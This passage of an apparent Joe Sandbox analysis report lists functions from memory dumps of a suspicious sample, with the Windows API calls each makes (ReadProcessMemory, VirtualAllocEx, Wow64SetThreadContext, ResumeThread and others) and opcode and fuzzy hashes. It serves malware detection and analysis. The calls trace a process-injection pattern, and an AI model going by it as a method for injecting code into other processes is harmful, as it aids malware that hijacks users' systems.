                              • Instruction Fuzzy Hash: 0E2133B19002599FCB10CFA9C980BDEBBF5FF48310F10882AE958A7250D7789954CBA5
                              Function 081274D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08127558
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: bfdb68f72ca02ac1dbae96dff8e31178c8f96f92b7e18d88b0fb1ddbc49d4a37
                              • Instruction ID: a8001491e46894b0954b99535c16d539a7ef5270542dcb7b5c144fd0370150e8
                              • Opcode Fuzzy Hash: bfdb68f72ca02ac1dbae96dff8e31178c8f96f92b7e18d88b0fb1ddbc49d4a37
                              • Instruction Fuzzy Hash: A02136B19002599FDB10CFA9C880AEEFFF1FF48320F10842EE959A7251D7389554CBA5
                              Function 0133D338 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133D76E,?,?,?,?,?), ref: 0133D82F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 839ef028450f1fba873dde496214ffd75d7adfb9e2b8a126cafc8c43672d6b82
                              • Instruction ID: 3370efcbc1d5930f6e151a87bd254429f5ac92ae37d25539223a4a0b192c697b
                              • Opcode Fuzzy Hash: 839ef028450f1fba873dde496214ffd75d7adfb9e2b8a126cafc8c43672d6b82
                              • Instruction Fuzzy Hash: 1F21E3B5900248EFDB10CF9AD584ADEBFF8EB48314F54806AE958A7311D374A954CFA4
                              Function 08127248 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                              Download Yara Rule
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081272CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 076e61b7df4a5d159918c1bd5736a97d56f78af436688934a4895d9559beec4c
                              • Instruction ID: d855690899e7b8021e45c23854e624ac50941fd9c15499fa7a894cf7ffd87e10
                              • Opcode Fuzzy Hash: 076e61b7df4a5d159918c1bd5736a97d56f78af436688934a4895d9559beec4c
                              • Instruction Fuzzy Hash: F0213AB1D002198FDB10DFA9C5847EFBBF5AF88324F14842ED459A7250C7789985CFA4
                              Function 08127250 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                              Download Yara Rule
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081272CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: dcafc0f8a1f8a86c46727f1de0bae555bba48c4a58383ee02ee9dad256816d1f
                              • Instruction ID: 3bb2872fd02a3056cc83eacae1a69675b148781aea7be8940d1bccd774af4b02
                              • Opcode Fuzzy Hash: dcafc0f8a1f8a86c46727f1de0bae555bba48c4a58383ee02ee9dad256816d1f
                              • Instruction Fuzzy Hash: C32138B19002198FDB10DFAAC4857EEBBF4EF88324F10842ED459A7241CB78A944CFA4
                              Function 081274D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                              Download Yara Rule
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08127558
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 0e3914a6e09437e5fd33ecf85f8d52dc9908e83fbc3bfb1dee3a05f4224a16fd
                              • Instruction ID: f4764216d97340cfe028b265ee9bdc3217d3f5111c3b407c49ffddc87ccbe382
                              • Opcode Fuzzy Hash: 0e3914a6e09437e5fd33ecf85f8d52dc9908e83fbc3bfb1dee3a05f4224a16fd
                              • Instruction Fuzzy Hash: 622128B18002599FCB10DFAAD940ADEFBF5FF48310F108429E959A7250D7349554CBA4
                              Function 0133D7A1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133D76E,?,?,?,?,?), ref: 0133D82F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 1c3a143f5490b8e4ca7115a4efdea29aa9319cbe255bb2bda862fba00c82df09
                              • Instruction ID: 35f7dfcc31ea3e6f7bc1cac35d93ff3a9e05c48d5ded7ff00bbb1edfdd9b2847
                              • Opcode Fuzzy Hash: 1c3a143f5490b8e4ca7115a4efdea29aa9319cbe255bb2bda862fba00c82df09
                              • Instruction Fuzzy Hash: CF21FFB9900248DFDB10CFA9D984AEEBFF4EB48310F14805AE918B7311D378A944CF64
                              Function 08127321 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08127396
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 967fcd4f4e748be9dfa92eb6e22f1271647047089d022b0e1e64d4b9a0a65f1d
                              • Instruction ID: b6215cdf888cbe9a60983e0a612cbc37b7de48199094c7256426018184d4a836
                              • Opcode Fuzzy Hash: 967fcd4f4e748be9dfa92eb6e22f1271647047089d022b0e1e64d4b9a0a65f1d
                              • Instruction Fuzzy Hash: 74118971800249CFCB20DFA9C844ADFBFF1AF88320F14881DD859A7251C7759554CFA5
                              Function 0133AFE8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B5A1,00000800,00000000,00000000), ref: 0133B7B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: c1bd147f95a6a7a26bff4f7a5fb1eaa744a6ca264ae36c5469cd1c9a536b27c4
                              • Instruction ID: ea00a542590d57b92b51dac7661806acacf6f2e1cb603d583d7489b14410ed22
                              • Opcode Fuzzy Hash: c1bd147f95a6a7a26bff4f7a5fb1eaa744a6ca264ae36c5469cd1c9a536b27c4
                              • Instruction Fuzzy Hash: D81114B69002488FDB20CF9AD444ADEFBF4EF88314F14842ED919A7210C375A544CFA8
                              Function 08127198 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 0efb8ee16728f57f8c842be1cd098ab0caadf239a5af357d1df47506c4fb4671
                              • Instruction ID: 6051390946457245dbf8934dc6006d65cc9e09e74dd6609fd1856456068e15a9
                              • Opcode Fuzzy Hash: 0efb8ee16728f57f8c842be1cd098ab0caadf239a5af357d1df47506c4fb4671
                              • Instruction Fuzzy Hash: A81176B19003488FDB20DFAAC4457DEFFF4EF89324F24882AD459A7241CB75A844CBA4
                              Function 08127328 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08127396
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: e436e825ab2e7f33294df69771e25f76f6b93fe75256cab72f36a13b27a3755e
                              • Instruction ID: 36ab63ed2d1febcd06c12b409e1137e4e3341295f9d8a5615e8639d9ada69b58
                              • Opcode Fuzzy Hash: e436e825ab2e7f33294df69771e25f76f6b93fe75256cab72f36a13b27a3755e
                              • Instruction Fuzzy Hash: 181126B1900249DFCB10DFAAC845ADFBFF5EF88324F108819E959A7250C775A554CFA4
                              Function 0133B741 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B5A1,00000800,00000000,00000000), ref: 0133B7B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: ab948fd564dd098668aedce4eb079ad8f0888161972bdc8ca7a69e072170b60f
                              • Instruction ID: 795211db77cdf912efebce9f2e31dc1dc49ddc422691e230e02937e9fa875aaa
                              • Opcode Fuzzy Hash: ab948fd564dd098668aedce4eb079ad8f0888161972bdc8ca7a69e072170b60f
                              • Instruction Fuzzy Hash: B71112B68002088FDB10CF9AD544ADEFBF4EF88314F14842AD919A7610C375A545CFA4
                              Function 081271A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: a80ef79b3b54c6c6feb1b62fda279e68b7c8f66b8ffc2cecba4aa41bf0a28b64
                              • Instruction ID: 9e1ceef82e16f5032f4d0b6756110c92e998550b5314467baad4f5d4dbd98ff4
                              • Opcode Fuzzy Hash: a80ef79b3b54c6c6feb1b62fda279e68b7c8f66b8ffc2cecba4aa41bf0a28b64
                              • Instruction Fuzzy Hash: 7E1136B19002588FDB20DFAAD4457DFFBF5EF89324F208829D459A7250CB75A944CFA4
                              Function 08120420 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08129CD5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 1d7e858205899c29bb4e6a2d505cc5d03a55470109a3f9e15bc4fc0e55e90391
                              • Instruction ID: a37cf2efe783159e38069fc0106dc8878f01b2105fd680a415179a0616ca5648
                              • Opcode Fuzzy Hash: 1d7e858205899c29bb4e6a2d505cc5d03a55470109a3f9e15bc4fc0e55e90391
                              • Instruction Fuzzy Hash: D911E3B5800258DFDB10DF9AD584BEEBFF8EB48314F108459E955A7200C375A954CFA5
                              Function 0133B4C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B526
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: b03bc0162ae28808109fd91d67c5584688b28ed06c6f871e82aaabc107b1d992
                              • Instruction ID: f3d049fcb6bde69f912ec7482f26b7d145b1cf71c1e027948413cb358af27dcf
                              • Opcode Fuzzy Hash: b03bc0162ae28808109fd91d67c5584688b28ed06c6f871e82aaabc107b1d992
                              • Instruction Fuzzy Hash: 19110FB5C00249CFDB10CF9AD444ADEFBF4AB89324F10842AD858B7250C379A545CFA5
                              Function 08129C70 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08129CD5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: d8c3f97f1d9c51726fb107b306091cb38757b6aed60520d25134d6b029e48c3d
                              • Instruction ID: 33baa51d95d5eb04e70cbd8ba4312c250ef4ea4e8ab1c538e4b12a28b21b8451
                              • Opcode Fuzzy Hash: d8c3f97f1d9c51726fb107b306091cb38757b6aed60520d25134d6b029e48c3d
                              • Instruction Fuzzy Hash: 041110B5800349DFDB10CF99D584BDEBFF8EB49324F20841AE858A7200C375A954CFA4
                              Function 07E77694 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q
                              • API String ID: 0-671973202
                              • Opcode ID: 96fab077036f29acfa9883c40623d5548849dc45aa7bd21f445caae70fe906e0
                              • Instruction ID: 73ce3977fca14d6ac7ebac2582346143648b4127b59b2eb955df8868b3d4c4e2
                              • Opcode Fuzzy Hash: 96fab077036f29acfa9883c40623d5548849dc45aa7bd21f445caae70fe906e0
                              • Instruction Fuzzy Hash: 8F51A071B012068FCB05DB79C84497EBBFAEFC42247248929E419DB365DF309D058BA0
                              Function 07E7C8EC Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q
                              • API String ID: 0-671973202
                              • Opcode ID: 52bf2cd1d552b84d94c70e4cd2e6153af9781eb77bc72e7eadede80309a13590
                              • Instruction ID: fd2bbf44e9638a85ce56f649450622b68496a3bf695f9f44bc6795730ca7bb3b
                              • Opcode Fuzzy Hash: 52bf2cd1d552b84d94c70e4cd2e6153af9781eb77bc72e7eadede80309a13590
                              • Instruction Fuzzy Hash: B23157B1D01219DFDB20DFA9C584BCEBBF9EB48318F24806AD404AB251D7755885CFA1
                              Function 07E7C260 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q
                              • API String ID: 0-671973202
                              • Opcode ID: ef2b3432e158a49c29d439bcd94838f6e2b439ac0b5aa215f4f341cda72a565e
                              • Instruction ID: bdc711b3cd2cd8aa1930301c843803f57e42fbfd3b8e6120d40d50844dad3a2d
                              • Opcode Fuzzy Hash: ef2b3432e158a49c29d439bcd94838f6e2b439ac0b5aa215f4f341cda72a565e
                              • Instruction Fuzzy Hash: 47115171B0160A8BCB44EBB999005EFB7FAAB84254F20447AC409E7254EB358D05CBA1
                              Function 07E79F4F Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: r
                              • API String ID: 0-621588783
                              • Opcode ID: 1eef42bde87fa1ce1d194999dc69a8b9e9a630ce2d6fb2e6a2386c42cdf1de5d
                              • Instruction ID: 9ab8d994c00f3a6d2e9e398e1a5faba591a1c845cbe7deced36d488cf5eefb38
                              • Opcode Fuzzy Hash: 1eef42bde87fa1ce1d194999dc69a8b9e9a630ce2d6fb2e6a2386c42cdf1de5d
                              • Instruction Fuzzy Hash: BBE04F72505149CFCB01CB78C8504ADBFB2EF0A200B195592F424EB263DB399C12DB22
                              Function 07E7ECD0 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;I
                              • API String ID: 0-1842435098
                              • Opcode ID: 9e33c228685d8ed57803d9dec9a4601adc073aae1131989c75b230ca6a0bb9a1
                              • Instruction ID: 056af17bcf2a024211ea340648dbab39e5dd56b0990527929cc092311f4ef4bd
                              • Opcode Fuzzy Hash: 9e33c228685d8ed57803d9dec9a4601adc073aae1131989c75b230ca6a0bb9a1
                              • Instruction Fuzzy Hash: 65D0123620410D9F4B41EAA4E840D5277DCBB247007408462F544C7020E722E564DB51
                              Function 07E71928 Relevance: .2, Instructions: 172COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1707e28d8edb63a1349cfa52e4a87611a05a5586e663a88ab0a88f6e22cd9b2
                              • Instruction ID: 52278b5cefb5485bf02899edd87971e3b5ad208f0abe05a7c811f2c4b2a6b134
                              • Opcode Fuzzy Hash: e1707e28d8edb63a1349cfa52e4a87611a05a5586e663a88ab0a88f6e22cd9b2
                              • Instruction Fuzzy Hash: AA5136B57142158FCB089B7D98546BE3BEBEFC8651B14447AE949C7394DE34CC02C7A0
                              Function 07E7E5B8 Relevance: .2, Instructions: 162COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd54600c660e520a583481a0329a4c068138c79c9b216e5e9f2f8135f7b82b9e
                              • Instruction ID: 4e7ac5c9b965999cac50ddabeb68c1aca2405f7517fd51ebf2163ff4fada77c9
                              • Opcode Fuzzy Hash: dd54600c660e520a583481a0329a4c068138c79c9b216e5e9f2f8135f7b82b9e
                              • Instruction Fuzzy Hash: 015103B0E06109DFEB08DFA9C9407BEBBB3FB85714F14906AE151AB385DB309941CB91
                              Function 07E7E5A8 Relevance: .2, Instructions: 152COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60b2cd2702b11f317d9171150fe8909a8fbd1a598fd058b9cdba30e6d8cd7d43
                              • Instruction ID: 6973e7d8d9fabe05f2e68fa3e46cae72d44c97001abfe8054b2e0224de47a2c9
                              • Opcode Fuzzy Hash: 60b2cd2702b11f317d9171150fe8909a8fbd1a598fd058b9cdba30e6d8cd7d43
                              • Instruction Fuzzy Hash: 2551D3B0F06109DBEB08DFA9C9417AEBBB3FB84710F14946AE541AB385DB349941CB91
                              Function 07E7A31F Relevance: .2, Instructions: 151COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e48b8a32032cd4263f9400d8cda37d865bc147f5bf7ebf195511b4acd2dbaafb
                              • Instruction ID: ebda8e90a62db8ecea9207cbabfb501c49dc0530009ae1cfcf70b01dd6a34646
                              • Opcode Fuzzy Hash: e48b8a32032cd4263f9400d8cda37d865bc147f5bf7ebf195511b4acd2dbaafb
                              • Instruction Fuzzy Hash: D95126F1A1A296CFC7108F6CD8402BDBBF2AB46215F04E57BE562DB291D739C984C711
                              Function 07E7A79E Relevance: .1, Instructions: 140COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b410d9f4064a795b3db2b9a6ff6d8b62f21fa8692f47cd4a9417fee82d931a1
                              • Instruction ID: 4002bd008c9c1a34e9d77fb5dc2fc499a2e0fa364b58be14e00a01d99e73108c
                              • Opcode Fuzzy Hash: 5b410d9f4064a795b3db2b9a6ff6d8b62f21fa8692f47cd4a9417fee82d931a1
                              • Instruction Fuzzy Hash: 9D51B1B4909684CFD706CB6AE954948BFF0EF4A210B2A80DAD484DF273D7359D55CB13
                              Function 07E7F030 Relevance: .1, Instructions: 122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97836fd6645ba1200aca9b75f51e93163d0defb2f6c0024c2bbf8eea63e1737e
                              • Instruction ID: 9f520333818f9a0d899e92030918101c992dfe264b86442750c16ec0f92d34cf
                              • Opcode Fuzzy Hash: 97836fd6645ba1200aca9b75f51e93163d0defb2f6c0024c2bbf8eea63e1737e
                              • Instruction Fuzzy Hash: 74413AB0B15205CFD714CB68C8447BABBB2FF86316F00916AE125CB392C7749882CB52
                              Function 07E734E7 Relevance: .1, Instructions: 117COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 98fe021a6ee2be1f76ba00cc25c3069698125c65aa6b982574b3fee00261204f
                              • Instruction ID: 6edda791d6545fbbb13dad08ec8bd50d77439472e4e7321088894396f65d7b10
                              • Opcode Fuzzy Hash: 98fe021a6ee2be1f76ba00cc25c3069698125c65aa6b982574b3fee00261204f
                              • Instruction Fuzzy Hash: EF41677160111ADFCF15EF68D885AAE7BA6FF84704F148429F802A7394CB30DC96DB90
                              Function 07E7A158 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 480bbcacfa5c0bc7b7c4d55370f80d80021a7f124ff2a6420bb4639483cbd3a2
                              • Instruction ID: 7d2be6908d302135090453a1b089ec1b5fccee81d5d3e2c01fd7a1f8971d5850
                              • Opcode Fuzzy Hash: 480bbcacfa5c0bc7b7c4d55370f80d80021a7f124ff2a6420bb4639483cbd3a2
                              • Instruction Fuzzy Hash: 7941E4F1A0E292CFD3118B6DC8503AEBFA0AF43209F04D1BBE195DB692D7358985CB51
                              Function 07E7B22B Relevance: .1, Instructions: 108COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c817f0aa6c8ce653a9e60e4a6fe3ccd91434666aa47b9f5394ae35b3877f3165
                              • Instruction ID: d8f13a0869314937fddbd8fdd7f16c232eac501bf55a48e128eb76e3cae23aef
                              • Opcode Fuzzy Hash: c817f0aa6c8ce653a9e60e4a6fe3ccd91434666aa47b9f5394ae35b3877f3165
                              • Instruction Fuzzy Hash: B0418AB4E0226DAFDF45CFA9D884AEDBBB2BB0A314F10A415E815F7214D7349991CF14
                              Function 07E71B70 Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 993fbea7700faf824e2407a04d78b9313c9a4899c037078396d4059e2302e315
                              • Instruction ID: 653c2c3a0dce4f65bd0e1d6aff87e18e4c7a531ccb102baf504a8c08b357fdd3
                              • Opcode Fuzzy Hash: 993fbea7700faf824e2407a04d78b9313c9a4899c037078396d4059e2302e315
                              • Instruction Fuzzy Hash: 8E41A170A1120ADFDB04EFA8E5416AD7BF6FF84705F0084A8E905A7255EF35AE09CB81
                              Function 07E7AAE6 Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71a585ea475179ee8cc75e8994e201e5c77da4b84c0576db96a3fa4a5516f75a
                              • Instruction ID: 225864fa80c477d9972afaac3b6cc4f6b820d8f2255868628fb8586f1947a2fd
                              • Opcode Fuzzy Hash: 71a585ea475179ee8cc75e8994e201e5c77da4b84c0576db96a3fa4a5516f75a
                              • Instruction Fuzzy Hash: BD4104B0E2A619DFCB40CFADE9848EEBBF0FB4E210F11A465E456A7211D7309960CB54
